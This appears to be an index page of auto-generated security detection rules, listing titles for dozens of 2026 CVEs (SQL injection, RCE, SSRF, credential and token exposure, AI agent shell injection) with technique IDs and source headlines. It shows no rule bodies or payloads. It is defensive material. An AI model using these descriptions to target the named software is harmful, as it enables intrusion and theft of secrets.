Auto-generated from F5 BIG-IP DNS Vulnerability Allows Privilege Escalation
🛡️ 2 more rules via /detect
CVE-2026-32673: F5 BIG-IP Scripted Monitor Command Execution
🌐 NVDT1068 — Privilege Escalation
Auto-generated from F5 BIG-IP Scripted Monitors Allow High-Privilege Command ...
🛡️ 2 more rules via /detect
Unauthorized Remote Access Tool Detection
🌐 NVDT1219 — Command and Control
Auto-generated from F5 BIG-IP/BIG-IQ CVE-2026-32643: High-Privilege RCE
CVE-2020-37168 - Systempay Weak Crypto - Brute Force Key Search
🌐 NVDT1190 — Initial Access
Auto-generated from Ecommerce Systempay 1.0 Critical Weak Crypto Vulnerabilit...
🛡️ 2 more rules via /detect
Privilege Escalation via Fuji Tellus Driver Load - CVE-2026-8108
🌐 NVDT1547.001 — Privilege Escalation
Auto-generated from Fuji Tellus Driver Grants All Users Kernel R/W: CVE-2026-...
🛡️ 2 more rules via /detect
MonsterInsights OAuth Token Exposure via get_ads_access_token() - CVE-2026-5371
🌐 NVDT1078.004 — Privilege Escalation
Auto-generated from MonsterInsights WordPress Plugin Exposes Google OAuth Tokens
🛡️ 2 more rules via /detect
ChurchCRM CVE-2026-44548: Cross-Site Request Forgery for Record Deletion (Free Tier)
🌐 NVDT1190 — Initial Access
Auto-generated from ChurchCRM CVE-2026-44548: High-Severity CSRF Allows Silen...
🛡️ 2 more rules via /detect
CVE-2026-44547: ChurchCRM Public User API Exploitation Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-44547: ChurchCRM Critical Vulnerability Persists...
🛡️ 1 more rules via /detect
ChurchCRM CVE-2026-42289: CSRF Admin Account Creation via UserEditor.php
🌐 NVDT1190 — Initial Access
Auto-generated from ChurchCRM CVE-2026-42289: CSRF Allows Admin Account Creation
🛡️ 2 more rules via /detect
CVE-2026-42288 - ChurchCRM Setup Wizard RCE via DB_PASSWORD
🌐 NVDT1190 — Initial Access
Auto-generated from ChurchCRM RCE: Unpatched Setup Wizard Leaves Systems Exposed
🛡️ 1 more rules via /detect
CVE-2026-41901: Thymeleaf SSTI Attempt via Expression Injection
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-41901: Critical Server-Side Template Injection i...
🛡️ 2 more rules via /detect
CVE-2026-1250: WordPress Court Booking SQL Injection Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-1250: WordPress Court Booking Plugin SQL Injection
🛡️ 2 more rules via /detect
CVE-2026-8449: Linux ksmbd Heap Corruption via Crafted DACL
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-8449: Linux ksmbd Heap Corruption Allows Remote ...
🛡️ 2 more rules via /detect
CVE-2026-45227 - Heym Sandbox Escape - Arbitrary Host Command Execution via Python Introspection
🌐 NVDT1059.006 — Execution
Auto-generated from Heym Sandbox Escape Vulnerability (CVE-2026-45227) Allows...
🛡️ 2 more rules via /detect
CVE-2026-45225 - Heym Path Traversal File Write Attempt
🌐 NVDT1505.003 — Persistence
Auto-generated from Heym Path Traversal (CVE-2026-45225) Allows Arbitrary Fil...
🛡️ 2 more rules via /detect
CVE-2026-44304: Lemur LDAP Authentication Privilege Escalation
🌐 NVDT1068 — Privilege Escalation
Auto-generated from CVE-2026-44304: Lemur LDAP Auth Flaw Allows Privilege Esc...
🛡️ 1 more rules via /detect
CVE-2026-44262: Laravel Scramble API Docs RCE via Documentation Endpoint
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-44262: Critical RCE in Laravel Scramble API Docs
🛡️ 2 more rules via /detect
CVE-2026-44260: elFinder Readonly Bypass File Operation
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-44260: efw4.X Readonly Flag Bypass Leads to File...
🛡️ 2 more rules via /detect
Micronaut Framework DoS via Locale Manipulation - CVE-2026-44241
🌐 NVDT1190 — Initial Access
Auto-generated from Micronaut Framework DoS Vulnerability (CVE-2026-44241) Ri...
🛡️ 2 more rules via /detect
CVE-2026-44015: Nginx UI SSRF to Internal Services
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-44015: Nginx UI SSRF Bypasses Network Segmentation
🛡️ 2 more rules via /detect
CVE-2026-43948: wger Password Reset Account Takeover
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-43948: wger Workout Manager Critical Account Tak...
🛡️ 2 more rules via /detect
CVE-2026-42855: Arduino ESP32 Digest Auth Bypass via Mismatched URI
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-42855: arduino-esp32 Digest Auth Bypass Threaten...
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-42854
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-42854: Critical RCE in arduino-esp32 WebServer
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-42544
🌐 NVDT1190 — Initial Access
Auto-generated from Granian HTTP Server Vulnerability: Unauthenticated DoS vi...
🛡️ 2 more rules via /detect
CVE-2026-40902: PhpSpreadsheet Malicious XLSX Upload DoS
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-40902: PhpSpreadsheet DoS Vulnerability Exploite...
🛡️ 1 more rules via /detect
CVE-2026-40863: PhpSpreadsheet XML DoS via Malformed Row Index
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-40863: PhpSpreadsheet DoS Vulnerability Hits Hig...
🛡️ 2 more rules via /detect
CVE-2026-26289: PowerSYSTEM Center Device Account Export via REST API
🌐 NVDT1040 — Credential Access
Auto-generated from CVE-2026-26289: PowerSYSTEM Center REST API Exposes Admin...
🛡️ 2 more rules via /detect
CVE-2026-44403 - Wing FTP Server Admin Lua Injection via mydirectory
🌐 NVDT1190 — Initial Access
Auto-generated from Wing FTP Server RCE (CVE-2026-44403) Allows Admin Lua Inj...
🛡️ 2 more rules via /detect
Credential Abuse from Breached Vendor — CVE-2026-44246
🌐 NVDT1078.004 — Initial Access
Auto-generated from CVE-2026-44246: nnU-Net Agentic Workflow Injection Puts G...
🛡️ 2 more rules via /detect
CVE-2026-44240: Node.js basic-ftp Client-Side DoS via Unterminated Multiline Response
🌐 NVDT1499 — Impact
Auto-generated from CVE-2026-44240: basic-ftp Client-Side DoS Poses Risk to N...
🛡️ 1 more rules via /detect
CVE-2026-7474 HashiCorp Nomad Path Traversal to Code Execution
🌐 NVDT1190 — Initial Access
Auto-generated from HashiCorp Nomad Code Execution (CVE-2026-7474) via Path T...
🛡️ 2 more rules via /detect
CVE-2026-44225: Pulpy Packager Arbitrary File Read of SSH Keys
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-44225: Pulpy Packager Allows Arbitrary File Access
🛡️ 2 more rules via /detect
ArcadeDB Database Creation Without Security - CVE-2026-44221
🌐 NVDT1200 — Privilege Escalation
Auto-generated from ArcadeDB Critical Vulnerability Bypasses Authorization Ac...
🛡️ 2 more rules via /detect
CVE-2026-34690 - Adobe After Effects Malicious File Open
🌐 NVDT1204.002 — Execution
Auto-generated from Adobe After Effects Stack-Based Buffer Overflow (CVE-2026...
🛡️ 2 more rules via /detect
CVE-2026-34686 - Adobe Commerce Stored XSS - Malicious Script Injection
🌐 NVDT1190 — Initial Access
Auto-generated from Adobe Commerce Stored XSS Puts Low-Privilege Attackers in...
🛡️ 2 more rules via /detect
Adobe Commerce Path Traversal File Write - CVE-2026-34653
🌐 NVDT1190 — Initial Access
Auto-generated from Adobe Commerce Path Traversal (CVE-2026-34653) Allows Fil...
🛡️ 2 more rules via /detect
Adobe Commerce Uncontrolled Resource Consumption - CVE-2026-34649
🌐 NVDT1499 — Impact
Auto-generated from Adobe Commerce DoS Vulnerability (CVE-2026-34649) Puts E-...
🛡️ 1 more rules via /detect
Adobe Commerce Uncontrolled Resource Consumption - CVE-2026-34648
🌐 NVDT1499 — Impact
Auto-generated from Adobe Commerce DoS Vulnerability: CVE-2026-34648 Puts E-C...
CVE-2026-34646 Adobe Commerce Unauthorized Write Access
🌐 NVDT1190 — Initial Access
Auto-generated from Adobe Commerce Vulnerability Allows Unauthorized Write Ac...
🛡️ 2 more rules via /detect
Adobe Commerce CVE-2026-34645 - Unauthenticated Write Access Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from Adobe Commerce CVE-2026-34645: Critical Auth Bypass Grant...
🛡️ 2 more rules via /detect
CVE-2026-23827: Unauthenticated RCE via Network Management Service
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-23827: Unauthenticated RCE in AOS-8 and AOS-10 N...
🛡️ 2 more rules via /detect
AOS-8 Network Management Service DoS Attempt - CVE-2026-23826
🌐 NVDT1190 — Initial Access
Auto-generated from AOS-8 Operating System Vulnerability Could Lead to DoS
🛡️ 1 more rules via /detect
CVE-2026-23825: Unauthenticated DoS via Malformed Network Message in AOS
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-23825: Unauthenticated DoS in AOS-8, AOS-10 Oper...
🛡️ 1 more rules via /detect
CVE-2026-23824: Unauthenticated Network Message Leading to DoS in AOS
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-23824: AOS-8 and AOS-10 Protocol Vulnerabilities...
🛡️ 1 more rules via /detect
CVE-2026-8431: MongoDB Ops Manager Webhook Template Injection RCE
🌐 NVDT1190 — Initial Access
Auto-generated from MongoDB Ops Manager RCE via Webhook Template Injection (C...
🛡️ 1 more rules via /detect
CVE-2026-8430 SPIP RCE via Nginx Configuration
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-8430: SPIP RCE Limited to Nginx Configurations
🛡️ 2 more rules via /detect
SPIP RCE via Arbitrary Code Execution - CVE-2026-8429
🌐 NVDT1190 — Initial Access
Auto-generated from SPIP RCE Vulnerability (CVE-2026-8429) Bypasses Security ...
🛡️ 2 more rules via /detect
CVE-2026-34682 - Substance3D Designer Malicious File Open
🌐 NVDT1204.002 — Execution
Auto-generated from Substance3D Designer Out-of-Bounds Write Allows RCE
🛡️ 2 more rules via /detect
CVE-2026-34681: Substance3D Designer Malicious File Execution
🌐 NVDT1204.002 — Execution
Auto-generated from Substance3D Designer RCE: Malicious File Opens Door to Ar...
🛡️ 1 more rules via /detect
CVE-2026-34660 - Adobe Connect Incorrect Authorization RCE via Malicious URL
🌐 NVDT1190 — Initial Access
Auto-generated from Adobe Connect Critical RCE: Incorrect Authorization Leads...
🛡️ 2 more rules via /detect
CVE-2026-34659: Adobe Connect RCE via Deserialization of Untrusted Data
🌐 NVDT1190 — Initial Access
Auto-generated from Adobe Connect CVE-2026-34659: Critical RCE via Deserializ...
🛡️ 2 more rules via /detect
CVE-2026-23823 - AOS-10 AP Command Injection via CLI
🌐 NVDT1059.004 — Execution
Auto-generated from AOS-10 AP Command Injection: CVE-2026-23823 Exposes Networks
🛡️ 1 more rules via /detect
CVE-2026-23821: Aruba AOS-10 AP RCE via Configuration Processing
🌐 NVDT1059.004 — Execution
Auto-generated from CVE-2026-23821: Aruba AOS-10 APs Vulnerable to RCE
🛡️ 1 more rules via /detect
CVE-2026-23820: Aruba AP CLI Arbitrary Command Execution
🌐 NVDT1059.004 — Execution
Auto-generated from CVE-2026-23820: Aruba AOS-8/10 AP CLI Vulnerability Allow...
🛡️ 2 more rules via /detect
CVE-2026-23819 - AOS Web Interface RCE via JavaScript Injection
🌐 NVDT1190 — Initial Access
Auto-generated from AOS-10/AOS-8 Instant AP Vulnerability Allows Remote Code ...
🛡️ 1 more rules via /detect
Fortinet FortiAuthenticator CVE-2026-44277 Unauthorized Code Execution - Free Tier
🌐 NVDT1190 — Initial Access
Auto-generated from Fortinet FortiAuthenticator Critical Improper Access Cont...
🛡️ 2 more rules via /detect
Pingvin Share X Authentication Bypass - CVE-2026-44196
🌐 NVDT1110.004 — Credential Access
Auto-generated from Pingvin Share X Critical 2FA Bypass (CVE-2026-44196)
🛡️ 1 more rules via /detect
CVE-2026-44183: Cleanuparr X-Forwarded-For Header Spoofing for Admin Login
🌐 NVDT1190 — Initial Access
Auto-generated from Cleanuparr CVE-2026-44183: Critical RCE via X-Forwarded-F...
🛡️ 1 more rules via /detect
CVE-2026-42898 - Microsoft Dynamics 365 Critical Code Injection
🌐 NVDT1190 — Initial Access
Auto-generated from Microsoft Dynamics 365 On-Premises Critical Code Injectio...
🛡️ 2 more rules via /detect
Microsoft Dynamics 365 Unnecessary Privileges RCE Attempt - CVE-2026-42833
🌐 NVDT1190 — Initial Access
Auto-generated from Microsoft Dynamics 365 On-Premises Critical RCE via Unnec...
🛡️ 2 more rules via /detect
CVE-2026-42823: Azure Logic Apps Unauthorized Privilege Escalation Attempt
🌐 NVDT1068 — Privilege Escalation
Auto-generated from CVE-2026-42823: Critical Privilege Escalation in Azure Lo...
🛡️ 2 more rules via /detect
CVE-2026-42048: Langflow Path Traversal - Arbitrary File Deletion Attempt
🌐 NVDT1561.002 — Impact
Auto-generated from CVE-2026-42048: Langflow Path Traversal Exposes Servers t...
🛡️ 2 more rules via /detect
CVE-2026-41103 - Microsoft SSO Plugin Auth Bypass - Initial Access
🌐 NVDT1190 — Initial Access
Auto-generated from Microsoft SSO Plugin for Jira & Confluence Critical Auth ...
🛡️ 1 more rules via /detect
CVE-2026-40402 - Windows Hyper-V Use-After-Free Privilege Escalation
🌐 NVDT1068 — Privilege Escalation
Auto-generated from Windows Hyper-V Critical Privilege Escalation via Use-Aft...
🛡️ 2 more rules via /detect
CVE-2026-40379: Azure Entra ID Spoofing Attempt via Malicious Token Request
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-40379: Critical Azure Entra ID Spoofing Vulnerab...
🛡️ 1 more rules via /detect
CVE-2026-33117 - Azure SDK Authentication Bypass Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from Azure SDK Critical Vulnerability Allows Authentication By...
🛡️ 2 more rules via /detect
CVE-2026-29204: Unauthorized Addon Access via clientarea.php
🌐 NVDT1078.004 — Privilege Escalation
Auto-generated from CVE-2026-29204: Critical Client Area Vulnerability Expose...
🛡️ 1 more rules via /detect
CVE-2026-43993: JunoClaw WAVS Bridge SSRF Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-43993: JunoClaw AI Platform SSRF Vulnerability
🛡️ 2 more rules via /detect
CVE-2026-43992: JunoClaw AI Exposed BIP-39 Seed in Tool Call
🌐 NVDT1537 — Defense Evasion
Auto-generated from CVE-2026-43992: JunoClaw AI Exposes BIP-39 Seeds in Tool ...
🛡️ 2 more rules via /detect
CVE-2026-43991 - JunoClaw Command Injection Bypass
🌐 NVDT1059.004 — Execution
Auto-generated from JunoClaw Command Bypass Vulnerability CVE-2026-43991 Pose...
🛡️ 1 more rules via /detect
CVE-2026-43990: JunoClaw Agentic AI Shell Injection via Plugin
🌐 NVDT1059.004 — Execution
Auto-generated from CVE-2026-43990: JunoClaw Agentic AI Shell Injection Risk
🛡️ 1 more rules via /detect
CVE-2026-43989: JunoClaw upload_wasm tool arbitrary file read
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-43989: JunoClaw Agentic AI Exposes Filesystem to...
🛡️ 2 more rules via /detect
CVE-2026-8111 - Ivanti Endpoint Manager SQL Injection RCE
🌐 NVDT1190 — Initial Access
Auto-generated from Ivanti Endpoint Manager RCE via SQL Injection (CVE-2026-8...
🛡️ 2 more rules via /detect
Privilege Escalation via Ivanti Endpoint Manager Agent - CVE-2026-8110
🌐 NVDT1068 — Privilege Escalation
Auto-generated from Ivanti Endpoint Manager Privilege Escalation (CVE-2026-8110)
🛡️ 2 more rules via /detect
Suspicious Command Shell Execution
🌐 NVDT1059.003 — Execution
Auto-generated from Ivanti Virtual Traffic Manager RCE via OS Command Injection
CVE-2026-8043 - Ivanti Xtraction Unauthenticated File Write via Web Directory
🌐 NVDT1190 — Initial Access
Auto-generated from Ivanti Xtraction Critical Vulnerability Allows Remote Fil...
🛡️ 2 more rules via /detect
CVE-2026-43939: YAF.NET Cross-Site Scripting in Thread Posting
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-43939: YAF.NET Cross-Site Scripting Vulnerability
🛡️ 2 more rules via /detect
CVE-2026-43938 - YetAnotherForum.NET XSS via User-Agent Logging
🌐 NVDT1190 — Initial Access
Auto-generated from YetAnotherForum.NET XSS via User-Agent Logging (CVE-2026-...
🛡️ 2 more rules via /detect
CVE-2026-43937 - YetAnotherForum.NET Arbitrary SQL Execution via /Admin/RunSql
🌐 NVDT1190 — Initial Access
Auto-generated from YetAnotherForum.NET Vulnerability Allows Arbitrary SQL Ex...
🛡️ 2 more rules via /detect
CVE-2026-42260: Open-WebSearch SSRF via Unrecognized IPv6 Literals
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-42260: Open-WebSearch SSRF Exposes Internal Netw...
🛡️ 2 more rules via /detect
CVE-2026-45091: Exposure of TOTP Secret in sealed-env JWS Payload
🌐 NVDT1539 — Credential Access
Auto-generated from CVE-2026-45091: Critical Secret Exposure in sealed-env Li...
🛡️ 2 more rules via /detect
CVE-2026-35071 Dell PowerScale InsightIQ OS Command Injection - Specific Command Pattern
🌐 NVDT1059.004 — Execution
Auto-generated from Dell PowerScale InsightIQ Vulnerability Allows OS Command...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-45218
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-45218: WP Travel Blind SQL Injection Puts User D...
🛡️ 3 more rules via /detect
CVE-2026-45214 - Xpro Elementor Addons SQL Injection Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from Xpro Elementor Addons SQL Injection (CVE-2026-45214) Pose...
🛡️ 2 more rules via /detect
CVE-2026-45213 - BEAR Woo-Bulk-Editor Blind SQL Injection Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from BEAR Woo-Bulk-Editor SQLi Puts WooCommerce Stores at Risk
🛡️ 2 more rules via /detect
CVE-2026-45211 - APIExperts Square for WooCommerce Blind SQLi Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from APIExperts Square for WooCommerce SQLi (CVE-2026-45211) E...
🛡️ 2 more rules via /detect
CVE-2026-42742 - Aman Views for WPForms Blind SQL Injection
🌐 NVDT1190 — Initial Access
Auto-generated from Aman Views for WPForms Vulnerability Allows Blind SQL Inj...
🛡️ 1 more rules via /detect
Ninja Forms Views Blind SQL Injection Attempt - CVE-2026-42741
🌐 NVDT1190 — Initial Access
Auto-generated from Ninja Forms Views Blind SQL Injection (CVE-2026-42741) — ...
🛡️ 1 more rules via /detect
CVE-2026-41713: AI Model Manipulation via Crafted Conversation Memory
🌐 NVDT1505.003 — Defense Evasion
Auto-generated from CVE-2026-41713: High-Severity AI Model Manipulation Vulne...
🛡️ 2 more rules via /detect
Spring AI Chat Memory Data Exposure - CVE-2026-41712
🌐 NVDT1190 — Initial Access
Auto-generated from Spring AI Chat Memory Vulnerability Exposes User Data
🛡️ 1 more rules via /detect
CVE-2026-2465 - Turboard FOR-S Privilege Escalation via Incorrect Authorization
🌐 NVDT1068 — Privilege Escalation
Auto-generated from Turboard FOR-S Privilege Escalation via Incorrect Authori...
🛡️ 2 more rules via /detect
CVE-2026-6001: ABIS BAPSİS Authorization Bypass via User-Controlled Key
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-6001: ABIS BAPSİS Authorization Bypass Exposes T...
🛡️ 1 more rules via /detect
CVE-2026-44412 - Solid Edge SE2026 PAR File Stack Overflow
🌐 NVDT1204.002 — Execution
Auto-generated from Solid Edge SE2026 Vulnerability Allows Code Execution via...
🛡️ 2 more rules via /detect
CVE-2026-44411 - Solid Edge SE2026 Uninitialized Pointer Access in PAR Parsing
🌐 NVDT1204.002 — Execution
Auto-generated from Solid Edge SE2026 Vulnerability Allows Code Execution via...
🛡️ 2 more rules via /detect
CVE-2026-41551: ROS# Path Traversal - Arbitrary File Access
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-41551: Critical Path Traversal in ROS# Exposes A...
🛡️ 2 more rules via /detect
CVE-2026-33893: Siemens Teamcenter Hardcoded Key Exploitation Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-33893: Siemens Teamcenter Hardcoded Key Exposes ...
🛡️ 2 more rules via /detect
CVE-2026-26762: Unauthenticated Control Panel Access to Web Browser
🌐 NVDT1200 — Discovery
Auto-generated from CVE-2026-27662: Control Panel Exposes Web Browser, High S...
🛡️ 1 more rules via /detect
—
Auto-generated from CVE-2026-25787: Critical XSS in Motion Control Diagnostics
🛡️ 2 more rules via /detect
CVE-2026-25786: XSS in PLC/Station Name Field - Free Tier
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-25786: Critical XSS in PLC/Station Name Field
🛡️ 2 more rules via /detect
CVE-2026-22924 - SIMATIC CN 4100 Unauthenticated Resource Exhaustion
🌐 NVDT1190 — Initial Access
Auto-generated from SIMATIC CN 4100 Critical Vulnerability: Unauthenticated R...
🛡️ 2 more rules via /detect
CVE-2025-6577 Akilli Commerce SQLi - Suspicious URI Query
🌐 NVDT1190 — Initial Access
Auto-generated from Akilli Commerce E-Commerce Website SQLi Vulnerability (CV...
🛡️ 2 more rules via /detect
CVE-2025-40949: RUGGEDCOM ROX Scheduler Command Injection via Web UI
🌐 NVDT1059.004 — Execution
Auto-generated from CVE-2025-40949: Critical RUGGEDCOM ROX Command Injection
🛡️ 2 more rules via /detect
RUGGEDCOM ROX Feature Key Installation Command Injection - CVE-2025-40947
🌐 NVDT1190 — Initial Access
Auto-generated from RUGGEDCOM ROX RCE via Feature Key Installation (CVE-2025-...
🛡️ 2 more rules via /detect
CVE-2025-40946: KACO new energy Inverter Technical Service Credential Derivation Attempt
🌐 NVDT1078.004 — Credential Access
Auto-generated from CVE-2025-40946: KACO new energy Inverter Credential Deriv...
🛡️ 1 more rules via /detect
CVE-2025-40833: IPv4 Null Pointer Dereference DoS Attempt
🌐 NVDT1499 — Impact
Auto-generated from CVE-2025-40833: IPv4 Null Pointer Dereference Triggers DoS
🛡️ 2 more rules via /detect
WordPress LifePress Plugin Stored XSS via lp_update_mds AJAX Action - CVE-2026-6690
🌐 NVDT1190 — Initial Access
Auto-generated from LifePress Plugin XSS: Unauthenticated Attackers Inject Ma...
🛡️ 1 more rules via /detect
CVE-2026-39432: Timetics Plugin Unauthenticated Access Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-39432: Timetics Plugin Missing Authorization Exp...
🛡️ 1 more rules via /detect
CVE-2026-2993 - AIWU WordPress Plugin SQL Injection
🌐 NVDT1190 — Initial Access
Auto-generated from WordPress AIWU Plugin SQLi: Unauthenticated Data Extraction
🛡️ 2 more rules via /detect
CVE-2026-41872: Kura Sushi App MITM via Improper Certificate Validation
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-41872: Kura Sushi App Vulnerable to MITM via Imp...
🛡️ 2 more rules via /detect
Zyxel NWA1100-N Firmware DoS via Buffer Overflow - CVE-2026-7287
🌐 NVDT1190 — Initial Access
Auto-generated from Zyxel NWA1100-N Firmware DoS: CVE-2026-7287 Buffer Overflow
🛡️ 3 more rules via /detect
Zyxel WRE6505 v2 Command Injection via CGI - CVE-2026-7256
🌐 NVDT1190 — Initial Access
Auto-generated from Zyxel WRE6505 v2: High-Severity Command Injection Vulnera...
🛡️ 1 more rules via /detect
CVE-2026-45430: Backdrop CMS Salesforce Module CSRF Authorization Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-45430: Backdrop CMS Salesforce Module CSRF Risk
🛡️ 1 more rules via /detect
CVE-2026-34263: SAP Commerce Cloud RCE via Spring Security Misconfiguration
🌐 NVDT1190 — Initial Access
Auto-generated from SAP Commerce Cloud: Critical RCE via Spring Security Misc...
🛡️ 2 more rules via /detect
SAP S/4HANA SQL Injection via Enterprise Search - CVE-2026-34260
🌐 NVDT1190 — Initial Access
Auto-generated from SAP S/4HANA SQLi: Critical Flaw Exposes Data, Risks Avail...
🛡️ 2 more rules via /detect
SAP F&R OS Command Execution Attempt - CVE-2026-34259
🌐 NVDT1059.004 — Execution
Auto-generated from SAP Forecasting & Replenishment OS Command Execution (CVE...
🛡️ 2 more rules via /detect
CVE-2026-45321: Malicious TanStack npm Package Publish via GitHub Actions OIDC
🌐 NVDT1649 — Defense Evasion
Auto-generated from CVE-2026-45321: TanStack npm Packages Hit by Critical Sup...
🛡️ 2 more rules via /detect
Vaultwarden CVE-2026-43914: Brute-Force Bypass via 2FA Email Endpoint
🌐 NVDT1110.004 — Credential Access
Auto-generated from Vaultwarden CVE-2026-43914: Brute-Force Bypass via 2FA Email
🛡️ 2 more rules via /detect
Vaultwarden Unconfirmed Owner Purge Vault - CVE-2026-43913
🌐 NVDT1485 — Impact
Auto-generated from Vaultwarden CVE-2026-43913: Unconfirmed Owners Can Purge ...
🛡️ 2 more rules via /detect
Vaultwarden CVE-2026-43912 - Unauthorized Group Membership Binding
🌐 NVDT1190 — Initial Access
Auto-generated from Vaultwarden CVE-2026-43912 Allows Org Data Access via Gro...
🛡️ 2 more rules via /detect
CVE-2026-43900: DeepChat SVG XSS Bypass via Obfuscated Entities
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-43900: DeepChat XSS Bypass Threatens AI Implemen...
🛡️ 2 more rules via /detect
CVE-2026-43899: DeepChat RCE via shell.openExternal() with malicious URL
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-43899: DeepChat RCE Via Incomplete Patch for Ext...
🛡️ 2 more rules via /detect
CVE-2026-34963: Barebox EFI PE Loader Heap Overflow via Malicious EFI Binary
🌐 NVDT1547.001 — Persistence
Auto-generated from CVE-2026-34963: barebox EFI PE Loader Memory Safety Flaws
🛡️ 2 more rules via /detect
CVE-2026-43893: ExifTool Argument Injection via Newline Characters
🌐 NVDT1204.002 — Execution
Auto-generated from CVE-2026-43893: ExifTool Argument Injection Threatens Fil...
🛡️ 2 more rules via /detect
CVE-2026-43890: Outline Subscriptions API Authorization Bypass
🌐 NVDT1190 — Initial Access
Auto-generated from Outline CVE-2026-43890: Authorization Bypass Exposes Docu...
🛡️ 1 more rules via /detect
CVE-2026-43888 - Outline Directory Traversal via Zip Extraction
🌐 NVDT1190 — Initial Access
Auto-generated from Outline Service Vulnerability CVE-2026-43888 Allows Direc...
🛡️ 2 more rules via /detect
CVE-2026-43887 - Outline Collaboration Service Client-Side Code Execution via Malicious Mention
🌐 NVDT1190 — Initial Access
Auto-generated from Outline Collaboration Service Vulnerability Allows Client...
🛡️ 2 more rules via /detect
CVE-2026-43886: Outline OAuth Scope Smuggling for API Access Escalation
🌐 NVDT1190 — Initial Access
Auto-generated from Outline Service Vulnerability Elevates OAuth Tokens to Fu...
🛡️ 2 more rules via /detect
SSRF Bypass via Redirect to Cloud Metadata - CVE-2026-43884
🌐 NVDT1190 — Initial Access
Auto-generated from WWBN AVideo SSRF Bypass via Redirects (CVE-2026-43884)
🛡️ 2 more rules via /detect
AVideo CloneSite Shared Secret Leak - CVE-2026-43873
🌐 NVDT1190 — Initial Access
Auto-generated from WWBN AVideo CVE-2026-43873: Shared Secret Leak Exposes Da...
🛡️ 2 more rules via /detect
CVE-2026-42564 - jotty·page Path Traversal to Read Sensitive Files
🌐 NVDT1190 — Initial Access
Auto-generated from jotty·page Path Traversal Vulnerability (CVE-2026-42564) ...
🛡️ 1 more rules via /detect
CVE-2026-42046: libcaca Canvas Import Heap Overflow Attempt
🌐 NVDT1204.002 — Execution
Auto-generated from CVE-2026-42046: libcaca Integer Overflow Resurfaces, RCE ...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-43874
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-43874: WWBN AVideo WebSocket Vulnerability Allow...
🛡️ 3 more rules via /detect
Pi-hole Privilege Escalation via Systemd Script PID Manipulation - CVE-2026-41489
🌐 NVDT1068 — Privilege Escalation
Auto-generated from Pi-hole Privilege Escalation via Systemd Scripts (CVE-202...
🛡️ 2 more rules via /detect
CVE-2026-8321: Inkeep Agents Authentication Bypass via Alternate Channel
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-8321: Inkeep Agents Authentication Bypass Vulner...
🛡️ 2 more rules via /detect
CVE-2026-42882 - S3 Proxy Authentication Bypass via Path Traversal
🌐 NVDT1190 — Initial Access
Auto-generated from oxyno-zeta/s3-proxy Critical Auth Bypass (CVE-2026-42882)
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-42869
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-42869: SOCFortress CoPilot Critical Auth Bypass
🛡️ 2 more rules via /detect
CVE-2026-2614 - MLflow Arbitrary File Read via Malicious Tag
🌐 NVDT1190 — Initial Access
Auto-generated from MLflow Arbitrary File Read Vulnerability Bypasses Path Va...
🛡️ 2 more rules via /detect
CVE-2026-45223: Crabbox Authentication Bypass with Admin Claim
🌐 NVDT1078.002 — Privilege Escalation
Auto-generated from CVE-2026-45223: Crabbox Authentication Bypass Allows Admi...
🛡️ 2 more rules via /detect
CVE-2026-42864: Unauthenticated RCE in FireFighter Incident Management App - Path Traversal
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-42864: Unauthenticated RCE in FireFighter Incide...
🛡️ 2 more rules via /detect
CVE-2026-8305 - OpenClaw BlueBubbles Webhook Improper Authentication
🌐 NVDT1190 — Initial Access
Auto-generated from OpenClaw Improper Authentication: CVE-2026-8305 Publicly ...
🛡️ 1 more rules via /detect
CVE-2026-45006 - OpenClaw config.apply Unsafe Configuration Write
🌐 NVDT1547.001 — Persistence
Auto-generated from OpenClaw Improper Access Control Bypasses Denylist, Allow...
🛡️ 2 more rules via /detect
CVE-2026-45004 - OpenClaw Arbitrary Code Execution via Malicious setup-api.js
🌐 NVDT1204.002 — Execution
Auto-generated from OpenClaw RCE: Arbitrary Code Execution via Plugin Setup R...
